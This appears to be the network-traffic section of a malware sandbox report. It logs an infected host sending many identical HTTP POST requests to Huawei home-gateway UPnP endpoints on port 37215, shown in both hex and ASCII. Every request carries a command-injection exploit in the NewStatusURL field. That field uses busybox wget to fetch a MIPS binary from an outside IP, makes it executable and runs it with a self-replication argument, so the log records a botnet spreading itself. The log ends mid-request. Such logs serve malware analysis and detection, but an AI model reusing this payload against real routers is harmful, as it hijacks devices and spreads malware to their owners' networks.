                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          717192.168.2.1543396157.0.52.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644326925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          718192.168.2.1555212128.248.81.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644349098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          719192.168.2.153321241.158.252.6137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644366026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          720192.168.2.1539150179.196.197.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.644797087 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          721192.168.2.153321841.44.141.20537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.645071983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          722192.168.2.1554762196.95.48.15737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.645093918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          723192.168.2.1546160197.147.28.14337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.645428896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          724192.168.2.1540548197.160.176.12337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.645654917 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          725192.168.2.153701441.228.103.7237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.645672083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          726192.168.2.155267241.107.211.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.645698071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 